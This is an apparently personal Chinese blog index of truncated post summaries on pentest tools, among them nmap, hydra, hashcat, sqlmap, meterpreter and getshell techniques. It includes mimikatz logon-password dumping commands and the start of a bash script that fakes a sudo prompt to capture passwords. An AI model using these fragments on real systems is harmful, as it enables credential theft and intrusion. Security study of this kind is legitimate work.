摘要: wordpress相关工具 wpscan https://github.com/wpscanteam/wpscan https://wpvulndb.com/users/choose_plan 注册api-token docker pull wpscanteam/wpscan docker安装 常用 阅读全文
posted @ 2022-11-20 22:08 是谁走漏了消息 阅读(32) 评论(0) 推荐(0) 编辑
摘要: responder使用 Options: --version show program's version number and exit -h, --help show this help message and exit -A, --analyze Analyze mode. This opti 阅读全文
posted @ 2022-11-20 22:07 是谁走漏了消息 阅读(91) 评论(0) 推荐(0) 编辑
摘要: shodan使用 city: 城市,貌似只支持英文,而且不是能是简称,如,TOKYO,Hong Kong,Seoul... country: 指定国家或地区后缀,比如:cn,us,jp,tw,br,ph,vn,hk... hostname: 指定主机名,其实就是目标域名[域名如果是子域还需要在前面加 阅读全文
posted @ 2022-11-20 22:07 是谁走漏了消息 阅读(238) 评论(0) 推荐(0) 编辑
摘要: nmap使用 参考资料:https://klionsec.github.io/page/10/ 使用 # nmap -v 192.168.3.240 扫描某单个目标[目标可以是域名,ip后者ip段] # nmap -iL ip.txt 同时扫描多个目标,把目标的ip/ip段事先放在一个文件中,每行对 阅读全文
posted @ 2022-11-20 22:06 是谁走漏了消息 阅读(18) 评论(0) 推荐(0) 编辑
摘要: mimikatz使用 一、获取密码 privilege::debug``sekurlsa::logonpasswords``mimikatz.exe ``"sekurlsa::debug"` `"sekurlsa::logonPasswords full"` `>>1.txt ``exit 一般我会 阅读全文
posted @ 2022-11-20 22:05 是谁走漏了消息 阅读(170) 评论(0) 推荐(0) 编辑
摘要: masscan使用 参考资料:https://klionsec.github.io/page/10/ github地址 https://github.com/robertdavidgraham/masscan masscan 常用选项: -p 指定要扫描的端口,同时指定多个端口要用逗号隔开 --ra 阅读全文
posted @ 2022-11-20 22:03 是谁走漏了消息 阅读(671) 评论(0) 推荐(0) 编辑
摘要: hydra 参数说明 -R 从上次未完成的爆破文件[hydra.restore]中读取爆破进度并接着上次的进度继续往后爆破 -S 爆破https时需要加上该选项 -s 如果要爆破的服务用的不是默认端口,可以用这个来手工指定服务端口号 -l/-L 指定用户名 / 指定用户名字典文件 -p/-P 指定密 阅读全文
posted @ 2022-11-20 22:02 是谁走漏了消息 阅读(127) 评论(0) 推荐(0) 编辑
摘要: google使用 基础过滤器 intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl intext: 从网页中搜索指定的关键字,经常会 阅读全文
posted @ 2022-11-20 22:00 是谁走漏了消息 阅读(154) 评论(0) 推荐(0) 编辑
摘要: hashcat 参考资料 https://blog.bbskali.cn/1635.html hashcat -m 1000 -a 0 -o winpass1.txt --remove win2.hash ptemp.txt 参数说明: “-m 1000” 表示破解密码类型为“NTLM”; “-a 阅读全文
posted @ 2022-11-20 22:00 是谁走漏了消息 阅读(172) 评论(0) 推荐(0) 编辑
摘要: frp 基础 下载地址:https://github.com/fatedier/frp/releases wget https://github.com/fatedier/frp/releases/download/v0.34.0/frp_0.34.0_linux_amd64.tar.gz 服务端: 阅读全文
posted @ 2022-11-20 21:57 是谁走漏了消息 阅读(64) 评论(0) 推荐(0) 编辑
摘要: Bttercap 参考连接 https://blog.csdn.net/weixin_41489908/article/details/118572751 https://blog.csdn.net/qq_44881113/article/details/119898952 https://blog 阅读全文
posted @ 2022-11-20 21:54 是谁走漏了消息 阅读(28) 评论(0) 推荐(0) 编辑
摘要: 使用记录 参考资料 https://xz.aliyun.com/t/3007 得到会话,上传文件 upload /root/360rd.exe c:/ProgramData 大小写 # 上传文件到目标机上 执行exe execute #在目标机中执行文件 execute -H -f cmd.exe 阅读全文
posted @ 2022-11-20 21:50 是谁走漏了消息 阅读(80) 评论(0) 推荐(0) 编辑
摘要: SQLmap使用手册 参考连接 https://www.tr0y.wang/2018/03/21/sqlmap-guide/#SQLmap-%E4%BB%8B%E7%BB%8D SQLmap 介绍 什么是 SQLmap Sqlmap 是由 Python 写成的,开源的自动化 SQL 注入工具 特点 阅读全文
posted @ 2022-11-20 21:46 是谁走漏了消息 阅读(500) 评论(0) 推荐(0) 编辑
摘要: phpmyadmin getshell 参考链接 https://xz.aliyun.com/t/3283#toc-8 1.直接写webshell 1.查看 secure_file_priv SHOW VARIABLES LIKE "secure_file_priv"; 当你尝试执行select i 阅读全文
posted @ 2022-11-20 21:41 是谁走漏了消息 阅读(109) 评论(0) 推荐(0) 编辑
摘要: mssql 参考连接 https://www.cnblogs.com/shellr00t/p/5310187.html https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/ 1.报错注入: 【1】首先爆版本:http:// 阅读全文
posted @ 2022-11-20 21:37 是谁走漏了消息 阅读(46) 评论(0) 推荐(0) 编辑
摘要: mysql基础注入知识 参考资料: https://pureqh.top/?p=1882 bypass安全狗 常用函数 ascii() length() substr() # 左闭右闭 hex() isnull() # isnull+load_file可以扫描判断文件名是否存在 cancat(0x7 阅读全文
posted @ 2022-11-20 21:31 是谁走漏了消息 阅读(22) 评论(0) 推荐(0) 编辑
摘要: Spring Boot Actuator(eureka xstream deserialization RCE) 参考资料: https://www.jianshu.com/p/91a5ca9b7c1c 本文的大部分步骤 https://github.com/LandGrey/SpringBootV 阅读全文
posted @ 2022-11-20 21:27 是谁走漏了消息 阅读(113) 评论(0) 推荐(0) 编辑
摘要: xhell6解密脚本 import hashlib import base64 string = "nt authority\system S-1-5-18" # ######## sha256 ######## sha256 = hashlib.sha256() sha256.update(str 阅读全文
posted @ 2022-11-20 21:14 是谁走漏了消息 阅读(32) 评论(0) 推荐(0) 编辑
摘要: 简单linux-sudo密码劫持脚本 #!/bin/bash swhoami=`whoami` if [[ ! -f "/tmp/..." ]]; then swhoami=`whoami` read -s -p "[sudo] password for $swhoami: " passwd ech 阅读全文
posted @ 2022-11-20 21:12 是谁走漏了消息 阅读(105) 评论(0) 推荐(0) 编辑
摘要: thinkphp漏洞 参考资料:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection 敏感信息 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3 阅读全文
posted @ 2022-11-20 21:10 是谁走漏了消息 阅读(172) 评论(0) 推荐(0) 编辑